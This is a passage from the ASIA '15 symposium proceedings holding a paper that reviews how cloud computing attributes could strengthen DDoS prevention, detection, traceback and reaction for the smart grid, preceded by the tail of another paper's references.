[17] J. A. Moorer, “About this reverberation business,” in Computer MusicJournal, vol. 3, 1978, pp. 13–28.

[18] W. Stallings, Cryptography and Network Security Principles and Prac-tice, 5th ed. New York, NY: Prentice Hall, 2010.

[19] S. media audio database, “Svv media audio database,” 2008. [On-line]. Available: http://download.wavetlan.com/SVV/Media/HTTP/http-wav.htm

[20] D. I. T. Network, “room impulse responses,” 2013. [Online].Available: http://www.dreams-itn.eu/index.php/dissemination/science-blogs/24-rir-databases

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 43

Using Features of Cloud Computing to DefendSmart Grid against DDoS Attacks

Anthony Califano, Ersin Dincelli, and Sanjay GoelUniversity at Albany, State University of New York

Albany, New YorkEmail: {acalifano, edincelli, goel}@albany.edu

Abstract—Smart Grid (SG) poses operational and businesschallenges for energy suppliers and utility companies that arereadily met by Cloud Computing (CC). Given the distributednature of SG and CC it is inevitable that the two technologieswill become integrated. In this paper we discuss the risksand opportunities that CC presents to energy suppliers andutility companies, and consider what inherent attributes of CCmay be able to be leveraged to improve Distributed Denial ofService (DDoS) defense for SG. An extended literature review isperformed to determine which DDoS defense techniques can beenhanced by CC and utilized to defend the SG. We propose that,when risks are properly mitigated, the deployment of CC canbe seen as an overall benefit, where its inherent attributes canbe harnessed to make the SG more secure and help mitigate thethreat of a crippling DDoS attack.

Keywords—Smart Grid, Cloud Computing, DDoS, Cyber Secu-rity, DDoS Defense, Critical Infrastructure

I. INTRODUCTION

The smart grid (SG) is an overlay of a communicationgrid over the electric grid to gain greater visibility that can beleveraged to improve its efficiency and resilience as well asto ease integration of alternate energy sources at a micro level[1]. The SG will link together our homes, electronic devices,vehicles, and businesses into a giant, intelligent network [2].Technologies such as Smart Home technology, the AdvancedMetering Infrastructure (AMI), corporate networks, SCADA,and other Industrial Control Systems (ICS) will all communi-cate with one another to control, distribute and monitor elec-tricity [3]. A fully realized SG will leverage these technologiesand decentralize energy generation, maximizing the efficiencyand reliability of energy generation and distribution [4].

Cloud Computing (CC) is suggested as a viable solutionfor the energy industry to process and store the data that iscollected by the AMI [5]. CC is a cost effective computingsolution that has many benefits including, but not limitedto, scalability, reliability, replication, device location inde-pendence and security [4]. Considering the adoption of CCby energy suppliers and utility companies, we explore howspecific attributes of CC could be leveraged to proactivelyprotect the SG against one of the most devastating types ofcyber-attacks, the distributed denial-of-service attack (DDoS).

As a critical infrastructure, the SG must remain functionalunder all circumstances [6]. The diversity and complexity ofthe communication networks and automation systems make theSG vulnerable to cyber-attacks such as DDoS [6]. Maligned

efforts to disrupt communication between SG componentscould result in major negative effects such as delays, lossof service and even physical damage [7], [8]. New strategiesare being developed to help protect the SG infrastructure anddata against malicious intent [9], and given how detailed andsensitive this type of data can be [10], countermeasures toprotect security and privacy are of paramount concern [8].

DDoS attacks are performed with the intention of interrupt-ing or suspending the communication capability [11], [12] ofany networked device or service by saturating the memoryor bandwidth of the targeted device [7]. They have beenrecognized as a significant concern to the SG [13] as the levelof technical prowess needed to conduct them is low and theyare easy to implement. In fact, the number of DDoS attackshas begun to rise, and their severity has increased, exceedingtraffic volumes of 100Gbps [14].

There are multiple DDoS defense techniques that, whencoupled with a quick defensive response [15] and easilyscalable computing resources, can be effective at mitigatingthe severity of attacks. We discuss the attributes of CC thatcould be used to enhance these techniques in the event of aDDoS attack on the SG. Based on an extended review of theliterature, we propose that CC may be leveraged to enhanceDDoS defense for the SG and its supporting infrastructure.

The paper is organized as follows: section two will describethe CC challenges and opportunities for SG and present themain potential risks and benefits of integrating CC into SG,section three will discuss how a DDoS could be performedagainst the SG and how CC can enhance existing DDoSdefense techniques, section four presents concluding remarks.

II. CLOUD COMPUTING CHALLENGES ANDOPPORTUNITIES FOR SMART GRID

Energy suppliers will have to contend with a fundamentalshift away from a model of centralized electricity generation atlarge fossil fuel burning or nuclear power plants, to one wheregeneration will occur in smaller, widely-distributed pockets ofrenewable energy sources [16]. Combined with the enhancedcommunication between customers, utility companies, andenergy suppliers, the SG will be able to react to shifts inelectricity demand in real-time. The SG is a superpositionof a communication grid over the power grid where finegrain usage data and operational sensor data is collected fromacross the grid and processed to improve operational efficiency,resilience, and reliability. As a result of this new paradigm,

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 44

energy suppliers are presented with many new challenges[12], such as how to deal with an exorbitant amount of datacollected from advanced metering technology, how to trackmany distributed sources of energy generation, and the relatedprivacy and security issues for each [17].

There are inherent risks associated with the integrationof CC into the SG, because CC was not originally designedfor high-assurance applications where consistency and securityof data has been the primary concern [18]. In the eventof a system failure or communications interruption, CloudService Providers (CSPs) need to ensure that data integrity ismaintained and lost data is recoverable. Issues with the latencyof CC applications and services, such as variability and degreeof latency need to be mitigated [19]. CSPs need to definethe location of data in the cloud while ensuring encryption,data segmentation, and granular access control are enforced[20]. Strong security measures and auditing controls need tobe defined in service level agreements to ensure data reliability,confidentiality, and auditing capabilities are preserved [4].Most importantly, CC relies on the Internet, a technology thatis inherently unreliable and prone to nefarious activity [6]. IfCC is to be used for SG it may be necessary to achieve greaterlevels of security and reliability within the current Internetinfrastructure.

Integrating CC into SG is a sensible business model forenergy suppliers to grapple with the storage and processingcapabilities required of a fully realized SG [19], [21], [22].CC offers energy suppliers and utility companies opportunities,such as: operating their services at a lower cost by takingadvantage of economies of scale; automation services thatare available as a service; real-time response for controlsignals and demand management; faster deployment of disasterrecovery and security implementations through virtualization[23]; and scalable resources that can adapt to fluctuations indemand. Most importantly, CC provides energy suppliers andutility companies the ability to outsource resource intensivetasks to the cloud [5].

These benefits coupled with a hybrid deployment, mixingcommunity and private CC, could achieve strong securityand privacy standards for SG [24], [4]. Additionally, thedeployment of CC would give energy suppliers and utilitycompanies access to computing resources that could lead tonew or enhanced services, the creation of new business models,and operating efficiencies. Given this, it is prudent to considerhow some of the inherent attributes of CC can help mitigatethe crippling effects of a DDoS attack made against a fullyrealized SG. There are several inherent CC attributes that makeit suitable for the SG..

First, CC provides a highly agile system that can quicklyadapt to fluctuations in data storage or processing needs. Asa result, additional services or new features implemented byenergy suppliers or utility companies can be deployed withoutdisrupting existing services [4]. Second, with a robust network,the effects of a natural disasters can be mitigated by shiftingprocessing and networking needs to other unaffected portionsof fully realized SG [3]. Spreading out portions of data orbacking up entire sets of data in multiple locations increasethe ability of the system to recover from disruptive events[3].Third, even though geographically diverse, the CC wouldact as a centralized processing infrastructure gaining higher

TABLE I. MAIN POTENTIAL RISKS AND BENEFITS OF INTEGRATINGCLOUD COMPUTING INTO SMART GRID

CC Attribute Potential Risk Potential Benefit

Agility &redundancy

Lack of efficiency in ability toscale up and down to match thedemand. Costs associated withlatency.

Ability to adapt to fluctua-tions and resource intensivetasks. Low storage costs due toeconomies of scale.

Device &locationindependence

Consistency of the data: Con-nectivity, latency and perfor-mance issues.

Resilience. Low operationcosts. Location / geographicindependence.

Real-timeresponse &elasticperformance

Consistency of the data: la-tency, performance, and dataauditing issues, billing errors.

Quick response to fluctua-tions in energy demand ensur-ing proper electricity distribu-tion/delivery.

Self-healing

Causes of errors / malfunctionsmay remain unknown. Self-repair may lead to system in-efficiencies or data inaccuracy.

Would greatly enhance the ro-bustness and endurance of SGsystems.

Virtualization& automationservices

Data security: Hypervisor andVM vulnerabilities and poten-tial misconfigurations.

Faster response time, disasterrecovery, and deployment ofsecurity implementations.

utilization than individual energy suppliers doing their owndata processing [19]. The elasticity of computing resourceswould help customers deal with unexpected increases in dataload. When data load levels return to normal, the extracomputing power can be retired [22]. Fourth, critical CCsystems can be designed to self-heal, having the capabilityto detect, diagnose, and react to infrastructure or softwaredisruptions [25]. Systems that are self-healing have the abilityto respond to environmental or operational disruptions in real-time, eliminating or greatly reducing the need for human inter-vention. Fifth, when maintenance is required on cyber-physicalsystems, virtualization would allow for the SG systems tooperate without service interruptions when [26] installing newpatches, applying secure configurations, or performing securityupgrades. Utilizing virtual machines (VMs) on SG systems be-comes less risky because the installation of special software isnot required to run applications or perform computations. TableI summarizes the potential risks and benefits of integrating CCinto SG.

III. HOW CLOUD COMPUTING CAN ENHANCE EXISTINGDDOS DEFENSE TECHNIQUES

The physical size and complexity of the SG increases itsvulnerability to DDoS attacks. An attack could be performedagainst many of the grid components, including but not limitedto, smart meters, networking devices, communication links,energy supplier servers, and infrastructure control systems [2].A DDoS attack against a portion of the SG infrastructurewould disrupt the communications network causing disruptionin automated or remote services, energy usage forecasting, orelectricity delivery and distribution [2]. This could lead to aleak of customer data, wide-scale blackouts, and the destruc-tion of the cyber-physical infrastructure [12]. Additionally,there are financial and legal implications for energy suppliersin the event that customer data is lost, stolen, or if billing datais falsified [12].

DDoS attacks can possibly affect every layer of the OSImodel, but the mitigation of large scale DDoS attacks occurover layers 3, 4 and 7. Our discussion focuses on attacksperformed over layer 4 and 7, because of their recent risein popularity and difficulty at defending and mitigating their

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 45

Fig. 1. DDoS Attack Risk over OSI Layer 7 from Malware Infected SG Connected Devicee

effects. A DDoS attack originating from malware infected SGdevices that is executed over these layers could have majorimpacts to the operations of the SG [6]. Figure 1 illustrates howa DDoS attack could be executed over SG through malwareinfected smart appliances over the OSI layer 7 (applicationlayer), targeting the corporate networks and industrial controlsystems of energy suppliers or utility companies.

There are many different techniques to defend againstDDoS attacks [27], but our analysis is limited to the DDoSdefense techniques that can be enhanced by utilizing theinherent attributes of CC. We are also assuming that CC isa fully integrated component of SG, to the extent that CC isnot just being used for data storage, but also data processing,virtualizing software for energy suppliers, utility companies,consumers, and integrating corporate networks and industrialcontrol systems. [28] categorizes DDoS defense techniquesinto four types: 1) attack prevention, 2) attack detection, 3)attack source identification, and 4) attack reaction.

A. Attack Prevention Defense Mechanisms

Attack prevention mechanisms attempt to stop DDoS at-tacks before they can reach their target, mostly through the useof a variety of packet filtering techniques [11], [29]. Methodssuch as ingress/egress filtering and router-based packet filteringare effective for small scale attacks, but in large, widelydistributed DDoS attacks, they are ineffective even when thesource of the attack is known [28]. While the effectiveness offiltering techniques is questionable, especially for OSI layer 7attacks, energy suppliers and utility companies could utilizehoneypots and honeynets to gain intelligence of potentialDDoS attacks. Honeypots are systems configured with limitedsecurity to trick would-be attackers to target them instead ofthe actual system [30]. Honeypots could take advantage ofCCs ability to virtualize servers and duplicate services [31].Traditionally, high-interaction Honeypots have been expensiveto maintain, especially when virtualization is unavailable. Thecreation of an array of honeypots with different configurations,to detect vulnerabilities from malware, replication vectors, anddatabases could be implemented cheaply, be less resourceintensive, and be restored more quickly if compromised. In

conjunction with a robust network intrusion detection system(IDS), honeypots could be actively distributed across VMs tomitigate computational overload, and play an integral role ina coordinated DDoS defense strategy [31], [26].

B. Attack Detection

Attack detection techniques need to be able to detectattacks in real time as well as post incident. Identification ofDoS attacks is primarily based on network data analysis (e.g.connection requests, packet headers, etc.) to detect anomaliesin traffic patterns and imbalances in traffic rates [32]. The de-tection system must be able to differentiate between legitimateand malicious traffic, keeping false positives results low so thatlegitimate users are not affected. In addition, these methodsshould have good system coverage and a short detection time[33]. Additionally, if authentication schemes for SG attacheddevices are compromised, attack source identification schemesmay prove very useful at detecting malicious activity [16].

DoS-Attack-Specific Detection is used to detect attacksthat exploit the Transmission Control Protocol (TCP) overOSI layer 4 (e.g., SYN Flooding), DoS-Attack-Specific de-tection methods attempt to identify when incoming traffic isnot proportional to outgoing traffic, the traffic is statisticallyunstable, or the attack flow does not have periodic behavior[34]. These types of detection techniques have had limitedsuccess against DDoS attacks [28], because each compromisedhost can closely mimic a legitimate user since there is no needto manipulate the traffic pattern of a single host. Assumingthat the inherent features of the attack are able to be detectedearly, elastic computing resources could strengthen SYN flooddefense mechanisms [35], and theoretically be used to instigatean intentional increase in attack strength. The geographicdiversity of cloud resources could be leveraged, using datafrom both first-mile and last-mile routers throughout a CSPsnetwork to pinpoint the attack source and aid ingress oregress filtering. This, coupled with redundant resources ableto perform packet state analysis, would decrease the amountof time needed to shut out illegitimate traffic [36].

Anomaly-Based Detection aims at detecting irregularities

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 46

in traffic patterns on OSI layer 7 that do not match normaltraffic patterns collected from training data. This detectionmethod has seen limited success against DDoS attacks becauseof the size and perceived legitimacy of BOTNETs. Anomaliesare not detected when traffic seems to comply with normaltraffic patterns. This technique may only be effective if irreg-ularities can be detected regarding the geographical locationof IP addresses or percentage of new IP addresses seen by thevictim [28]. Historical data from across geographic diverseCSP resources may make anomaly detection techniques moreeffective by providing a more robust dataset for analysis. Theagile and elastic performance capabilities of CC may enablemore resilient mitigation algorithms, such as an adaptivesystem for detecting XML and HTTP application layer attacks[37], and SOTA [38] to further mitigate X-DoS and DX-DoSattacks.

C. Attack Source Identification

Attack source identification attempts to locate where DDoSattacks are originating from. These techniques are highlydependent on the Internet router infrastructure, and becauseDDoS attacks originate from different geographical locations,many traceback schemes are not effective against DDoS at-tacks. The hash-based IP traceback method is worth mention-ing as it has been shown to be effective against DDoS attacks,with some caveats [39]. The network topology possibilitiesoffered by SG and CC [13] may enable new attack sourceidentification schemes that succeed where traditional tracebackschemes have fallen short [29]. For hash-based traceback tobe effective, there needs to be a wide geographic distributionof modern traceback routers and an abundance of computingoverhead to analyze packet data, especially over long periodsof time [39]. Assuming that CSPs have a large distributionof traceback routers throughout their network, and that cloudresources are spread out geographically, IP Traceback couldtake advantage of the agile and redundant resources availablein CC. The agile and redundant computational capabilitiescould be leveraged for packet filtering techniques workingin conjunction with other DDoS defense mechanisms [40] tosustain SG services, and perform data analysis from tracebackrouters on the CSP network to aid ingress and egress filtering.

D. Attack Reaction

Attack reaction techniques attempt to mitigate or eliminatethe effects of a DDoS attack. For the future SG, this is anecessary feature to prevent the SG from being completelyparalyzed by an attack [3]. Methods include but are not limitedto filtering out bad traffic, duplicating network resources, oreven assigning costs to certain processes or transactions tolimit the abuse of computational resources. CC offers manyopportunities to enhance these capabilities, increasing theircapacity and endurance.

History-based IP filtering (HIP) is a mechanism whererouters allow incoming packets when they are verified against apre-populated IP address database [41]. This defensive methodis deemed meaningless if devices with a legitimate purpose onthe SG are compromised and being used as part of a BOTNET[42]. HIP filtering defense could leverage the geographicdiversity, agility, and elastic performance of CC, but moredetail would be needed about how CSPs would implement the

verification process for IPs to know how and when this wouldbe a benefit.

Load balancing is implemented when there is a need toincrease the available server functions for critical systems toprevent them from shutting down in the event of a DDoS attack[42]. Load balancing has the capability to utilize computationalresources across distributed networks [43], readily utilizinginherent abilities of CC, such as agility and redundancy,real-time response and elastic performance, and virtualizationand automation services [43], [44]. There are challenges toovercome, such as the cost of the distributed computationalload [45], latency, and computational bottlenecks [46], but ifproperly implemented, the benefits of load balancing could beused by CSPs to help mitigate the effects of a DDoS attackmade against the SG.

Selective pushback attempts to filter the data stream closeto the DDoS attack source, by determining the source ofthe attack and sending the location data to all upstreamrouters [33]. When attack traffic is normally distributed, or theattack origin IP is spoofed, attempts of filtering attack trafficbecome difficult [28]. Regardless of the exact technique usedto monitor network congestion and packets legitimacy, the goalof the Pushback method is to filter the bad traffic as close tothe source of the attack as possible. CC would be deployedindirectly, much like with DoS-Attack-Specific-Detection andIP Traceback, taking advantage of agility, geographic diversity,and elastic performance to enhance the effectiveness of push-back schemes such as the cooperative pushback mechanismproposed by [33].

Source-end reaction schemes, such as D-WARD, attemptto catalog data flow statistics by constantly monitoring thetwo-way traffic between the source network and the rest ofthe Internet [47]. Statistics are collected such as the ratioof in-traffic and out-traffic, and number of connections perdestination. The system periodically compares collected dataagainst normal flow data models for each type of traffic thatthe source network receives, and if a mismatch occurs, trafficis either filtered or rate-limited [47]. Baring privacy issues,the agility of CC could be leveraged with virtualization andautomation services to catalog the traffic between SG infras-tructure, CSP resources, utility companies, and infrastructurecontrol networks, creating a robust dataset that could be usedto protect the SG infrastructure. Additionally, the elastic per-formance of CC could be leveraged to quickly and efficientlycompare historical and new data to detect irregularities andgenerate a quicker attack responses.

Analysis of traffic data attempts to identify forensic infor-mation in event logs that can identify the specific features andpatterns of a DDoS attack [41]. This form of defense onlyworks if a DDoS against the system has occurred, data wasable to be collected and analyzed, and defense mechanismshave been created to filter or throttle future attack traffic[42]. Event logs from firewalls, server logs, and honeypotswould be analyzed to determine the attributes of future DDoSattacks [41]. CC attributes such as agility, real-time responseand elastic performance, and virtualization and automationservices could be used to enhance the capabilities of event loganalysis, in addition to automating security patches to firewallsand applying configuration updates to honeypots based off ofanalysis results.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 47

TABLE II. DEFENSE TECHNIQUES AND BENEFICIAL CLOUD COMPUTING ATTRIBUTES

Type of Defense Type of Attack Defense Technique Beneficial CC Attributes*

Attack Prevention SYN Flood (TCP), Smurf Attack,PDF GET, HTTP GET, HTTP POST Honeypots AR, SH, V

Attack DetectionSYN Flood, Smurf Attack DoS-Attack-Specific Detection AR, DLI, RPP

PDF GET, HTTP GET, HTTP POST Anomaly-Based Detection AR, DLI, RPP

Attack SourceIdentification

SYN Flood, Smurf Attack; PDFGET, HTTP GET, HTTP POST Hash-Based IP Traceback AR, DLI

Attack ReactionSYN Flood, Smurf Attack;PDF GET, HTTP GET,HTTP POST

HIP Filtering AR, DLI, RPP

Load Balancing AR, RPP

Selective Pushback AR, DLI, RPP

Source-End Reaction AR, RPP

Analysis of Traffic Data AR, RPP, SH, V

Fault Tolerance AR, DLI, RPP, SH, V

Resource Pricing AR, DLI, RPP, V

*AR: Agility & Redundancy, SH: Self-healing, V: Virtualization, DLI: Device & Location Independence, RPP: Real-time Response& Elastic Performance

Fault Tolerance method assumes that it is impossible toprevent or stop DDoS attacks completely, and rather focuseson mitigating the effects of attacks so the affected network canremain operational. The methodology is based on duplicatingnetwork services and diversifying points of access to thenetwork. In the event of an attack, the congestion caused byattack traffic will not take down all of the affected network.Similarly to that of load balancing, fault tolerance methodscould leverage CC attributes, such as agility and redundancy,real-time response and elastic performance, and virtualizationand automation services to duplicate services and keep the SGnetwork responsive for legitimate traffic.

Resource Pricing is a mitigation approach that utilizes adistributed gateway architecture and payment protocol to estab-lish a dynamically changing cost, or computational burden, forinitiating different types of network services [48]. This tech-nique favors users who behave well, and discriminates againstusers who abuse system resources, by partitioning services intopricing tiers to avoid malicious users from flooding the systemwith fake requests to attempt price manipulation. The highagility and elastic performance inherent in CC would alleviatethe computational burden of Resource Pricing techniques [49].As the demand of assigning prices to users grows, the computa-tional demand would be easily mitigated by the ability of CSPsto add additional computing resources. Cost levels could easilybe assigned to put users into a cost hierarchy, and virtualizationcapabilities could be used to duplicate network resources andinfrastructure capabilities, partitioning users paying differentcost levels into separate processing areas. Illegitimate trafficwould be sectioned off from the legitimate traffic, reducingthe impact of an attack, and if needed, be geographicallyindependent.

Table II summarizes the DDoS defense techniques that canbe enhanced by utilizing the CC attributes to defend SG againstDDoS attacks.

E. Other Approaches to Consider

Even before CC was aptly branded as such, it was arguedthat isolated defense mechanisms fail to offer performanceguarantees against DDoS attacks [50]. This would require aparadigm shift, where systems acting in isolation would insteadact as a distributed framework of non-hierarchal, specialized

defense nodes connecting to one another to achieve an overalllevel of better defense against DDoS attacks. Distributedcontrol architectures, such as the ENERGOS project [51], pro-poses a multi-layered system of intelligent nodes that containenough operational information to carry on complex tasks ifthere is a hierarchal breakdown of communication. The caveatof this approach is that it requires the availability of advancedprocessing capabilities and a networked infrastructure robustenough to support large data streams.

IV. CONCLUSION

As innovations to our personal devices, automated homes,and electric vehicles continue to close the gap between cyberand physical, the SG and CC will eventually become con-nected, if not integrated with one another. The proliferationof SG technology has presented energy suppliers and utilitycompanies with challenges that CC could readily meet, but notwithout mitigating many of CCs outstanding issues. Careless-ness in the deployment of CC solutions for SG applicationsmay result in an environment that is more prone to cyber-attacks such as DDoS. Unless a separate communicationsnetwork is layered on top of the electrical grid [6], the dangersof a DDoS attack from those with malicious intent, whetherfor financial gain or to terrorize our society remains a very realpossibility with severe consequences. The critical nature of theSG means that a real defense solution needs to be developed toprotect against DDoS attacks. Victims of DDoS attacks needan easily scalable approach that can quickly add additionalresources to defend against DDoS attacks. CC provides theability to distribute this computational burden across a largepool of resources to compensate for a rapid increase in com-putational needs. Leveraging the inherent attributes of the CCto help defend against DDoS attacks may not be a permanentsolution, but it may be the most readily available answer to thisneed. While, the integration of CC and SG is inevitable, thefeatures of CC can be leveraged to improved defense againstDDoS attacks.

REFERENCES

[1] S. Goel, S. F. Bush, and D. Bakken, IEEE Vision for Smart GridCommunications: 2030 and Beyond. IEEE, 2013.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 48

[2] Y. Mo, T.-H. Kim, K. Brancik, D. Dickinson, H. Lee, A. Perrig, andB. Sinopoli, “Cyber-physical security of a smart grid infrastructure,”Proceedings of the IEEE, vol. 100, no. 1, pp. 195–209, 2012.

[3] R. E. Brown, “Impact of smart grid on distribution system design,” inPower and Energy Society General Meeting-Conversion and Deliveryof Electrical Energy in the 21st Century, 2008 IEEE. IEEE, 2008, pp.1–4.

[4] M. Yigit, V. C. Gungor, and S. Baktir, “Cloud computing for smart gridapplications,” Computer Networks, vol. 70, pp. 312–329, 2014.

[5] X. Fang, D. Yang, and G. Xue, “Evolving smart grid informationmanagement cloudward: A cloud optimization perspective,” Smart Grid,IEEE Transactions on, vol. 4, no. 1, pp. 111–119, 2013.

[6] S. Goel, “Anonymity vs. security: The right balance for the smart grid,”Communications of the Association for Information Systems, vol. 36,no. 1, p. 2, 2015.

[7] D. Wei, Y. Lu, M. Jafari, P. M. Skare, and K. Rohde, “Protectingsmart grid automation systems against cyberattacks,” Smart Grid, IEEETransactions on, vol. 2, no. 4, pp. 782–795, 2011.

[8] J. Liu, Y. Xiao, S. Li, W. Liang, and C. Chen, “Cyber security andprivacy issues in smart grids,” Communications Surveys & Tutorials,IEEE, vol. 14, no. 4, pp. 981–997, 2012.

[9] A. Wokutch, “The role of non-utility service providers in smart griddevelopment: Should they be regulated, and if so, who can regulatethem?” Journal of Telecommunications and High Technology Law,vol. 9, p. 531, 2011.

[10] S. Iyer, “Cyber security for smart grid, cryptography, and privacy,”International Journal of Digital Multimedia Broadcasting, vol. 2011,2011.

[11] J. Mirkovic and P. Reiher, “A taxonomy of ddos attack and ddos defensemechanisms,” ACM SIGCOMM Computer Communication Review,vol. 34, no. 2, pp. 39–53, 2004.

[12] W. Wang and Z. Lu, “Cyber security in the smart grid: Survey andchallenges,” Computer Networks, vol. 57, no. 5, pp. 1344–1371, 2013.

[13] A. Hahn, A. Ashok, S. Sridhar, and M. Govindarasu, “Cyber-physicalsecurity testbeds: Architecture, application, and evaluation for smartgrid,” Smart Grid, IEEE Transactions on, vol. 4, no. 2, pp. 847–855,2013.

[14] T. Karnwal, T. Sivakumar, and G. Aghila, “A comber approach toprotect cloud computing against xml ddos and http ddos attack,” inElectrical, Electronics and Computer Science (SCEECS), 2012 IEEEStudents’ Conference on. IEEE, 2012, pp. 1–5.

[15] A. G. Tartakovsky, B. L. Rozovskii, R. B. Blazek, and H. Kim, “A novelapproach to detection of intrusions in computer networks via adaptivesequential and batch-sequential change-point detection methods,” SignalProcessing, IEEE Transactions on, vol. 54, no. 9, pp. 3372–3382, 2006.

[16] Z. M. Fadlullah, M. M. Fouda, N. Kato, X. Shen, and Y. Nozaki,“An early warning system against malicious activities for smart gridcommunications,” Network, IEEE, vol. 25, no. 5, pp. 50–55, 2011.

[17] S. Goel, Y. Hong, V. Papakonstantinou, and D. Kloza, “Smart gridsecurity,” SpringerBriefs in Cybersecurity (, 2015.

[18] B. P. Rimal, E. Choi, and I. Lumb, “A taxonomy and survey of cloudcomputing systems,” in INC, IMS and IDC, 2009. NCM’09. FifthInternational Joint Conference on. Ieee, 2009, pp. 44–51.

[19] E. Brynjolfsson, P. Hofmann, and J. Jordan, “Cloud computing andelectricity: beyond the utility model,” Communications of the ACM,vol. 53, no. 5, pp. 32–34, 2010.

[20] M. T. Khorshed, A. S. Ali, and S. A. Wasimi, “A survey on gaps,threat remediation challenges and some thoughts for proactive attackdetection in cloud computing,” Future Generation computer systems,vol. 28, no. 6, pp. 833–851, 2012.

[21] L. Zheng, S. Chen, Y. Hu, and J. He, “Applications of cloud computingin the smart grid,” in Artificial Intelligence, Management Science andElectronic Commerce (AIMSEC), 2011 2nd International Conferenceon. IEEE, 2011, pp. 203–206.

[22] D. S. Markovic, D. Zivkovic, I. Branovic, R. Popovic, and D. Cvetkovic,“Smart power grid and cloud computing,” Renewable and SustainableEnergy Reviews, vol. 24, pp. 566–577, 2013.

[23] G. C. Wilshusen, Information Security: Federal Guidance Needed to

Address Control Issues with Implementing Cloud Computing. DIANEPublishing, 2010.

[24] F. Luo, Z. Y. Dong, Y. Chen, Y. Xu, K. Meng, and K. P. Wong,“Hybrid cloud computing platform: the next generation it backbonefor smart grid,” in Power and Energy Society General Meeting, 2012IEEE. IEEE, 2012, pp. 1–7.

[25] Y. Dai, Y. Xiang, and G. Zhang, “Self-healing and hybrid diagnosis incloud computing,” in Cloud computing. Springer, 2009, pp. 45–56.

[26] A. Bakshi and B. Yogesh, “Securing cloud from ddos attacks usingintrusion detection system in virtual machine,” in Communication Soft-ware and Networks, 2010. ICCSN’10. Second International Conferenceon. IEEE, 2010, pp. 260–264.

[27] M. Darwish, A. Ouda, and L. F. Capretz, “Cloud-based ddos attacksand defenses,” in Information Society (i-Society), 2013 InternationalConference on. IEEE, 2013, pp. 67–71.

[28] T. Peng, C. Leckie, and K. Ramamohanarao, “Survey of network-baseddefense mechanisms countering the dos and ddos problems,” ACMComputing Surveys (CSUR), vol. 39, no. 1, p. 3, 2007.

[29] K. Park and H. Lee, “On the effectiveness of route-based packet filteringfor distributed dos attack prevention in power-law internets,” in ACMSIGCOMM Computer Communication Review, vol. 31, no. 4. ACM,2001, pp. 15–26.

[30] L. Spitzner, Honeypots: tracking hackers. Addison-Wesley Reading,2003, vol. 1.

[31] S. Biedermann, M. Mink, and S. Katzenbeisser, “Fast dynamic extractedhoneypots in cloud computing,” in Proceedings of the 2012 ACMWorkshop on Cloud computing security workshop. ACM, 2012, pp.13–18.

[32] G. Carl, G. Kesidis, R. R. Brooks, and S. Rai, “Denial-of-service attack-detection techniques,” Internet Computing, IEEE, vol. 10, no. 1, pp.82–89, 2006.

[33] R. Mahajan, S. M. Bellovin, S. Floyd, J. Ioannidis, V. Paxson, andS. Shenker, “Controlling high bandwidth aggregates in the network,”ACM SIGCOMM Computer Communication Review, vol. 32, no. 3, pp.62–73, 2002.

[34] T. M. Gil and M. Poletto, “Multops: a data-structure for bandwidthattack detection,” in USENIX Security Symposium, 2001.

[35] S. R. Ghanti and G. Naik, “Protection of server from syn flood attack,”Journal Impact Factor, vol. 5, no. 11, pp. 37–46, 2014.

[36] K. Choi, X. Chen, S. Li, M. Kim, K. Chae, and J. Na, “Intrusiondetection of nsm based dos attacks using data mining in smart grid,”Energies, vol. 5, no. 10, pp. 4091–4109, 2012.

[37] T. Vissers, T. S. Somasundaram, L. Pieters, K. Govindarajan, andP. Hellinckx, “Ddos defense system for web services in a cloudenvironment,” Future Generation Computer Systems, vol. 37, pp. 37–45,2014.

[38] A. Chonka, Y. Xiang, W. Zhou, and A. Bonti, “Cloud security defence toprotect cloud computing against http-dos and xml-dos attacks,” Journalof Network and Computer Applications, vol. 34, no. 4, pp. 1097–1107,2011.

[39] A. C. Snoeren, C. Partridge, L. A. Sanchez, C. E. Jones, F. Tchakountio,S. T. Kent, and W. T. Strayer, “Hash-based ip traceback,” in ACMSIGCOMM Computer Communication Review, vol. 31, no. 4. ACM,2001, pp. 3–14.

[40] M. Sung and J. Xu, “Ip traceback-based intelligent packet filtering: anovel technique for defending against internet ddos attacks,” Paralleland Distributed Systems, IEEE Transactions on, vol. 14, no. 9, pp. 861–872, 2003.

[41] A. Mitrokotsa and C. Douligeris, “Denial-of-service attacks,” NetworkSecurity: Current Status and Future Directions, pp. 117–134, 2007.

[42] C. Douligeris and A. Mitrokotsa, “Ddos attacks and defense mecha-nisms: classification and state-of-the-art,” Computer Networks, vol. 44,no. 5, pp. 643–666, 2004.

[43] M. Randles, D. Lamb, and A. Taleb-Bendiab, “A comparative studyinto distributed load balancing algorithms for cloud computing,” in Ad-vanced Information Networking and Applications Workshops (WAINA),2010 IEEE 24th International Conference on. IEEE, 2010, pp. 551–556.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 49

[44] S. Begum and C. Prashanth, “Review of load balancing in cloudcomputing.” International Journal of Computer Science Issues (IJCSI),vol. 10, no. 1, 2013.

[45] A. Khiyaita, M. Zbakh, H. El Bakkali, and D. El Kettani, “Loadbalancing cloud computing: state of art,” in Network Security andSystems (JNS2), 2012 National Days of. IEEE, 2012, pp. 106–109.

[46] J. Hu, J. Gu, G. Sun, and T. Zhao, “A scheduling strategy on load bal-ancing of virtual machine resources in cloud computing environment,”in Parallel Architectures, Algorithms and Programming (PAAP), 2010Third International Symposium on. IEEE, 2010, pp. 89–96.

[47] J. Mirkovic, G. Prier, and P. Reiher, “Attacking ddos at the source,”in Network Protocols, 2002. Proceedings. 10th IEEE InternationalConference on. IEEE, 2002, pp. 312–321.

[48] R. J. Gibbens and F. P. Kelly, “Resource pricing and the evolution ofcongestion control,” Automatica, vol. 35, no. 12, pp. 1969–1985, 1999.

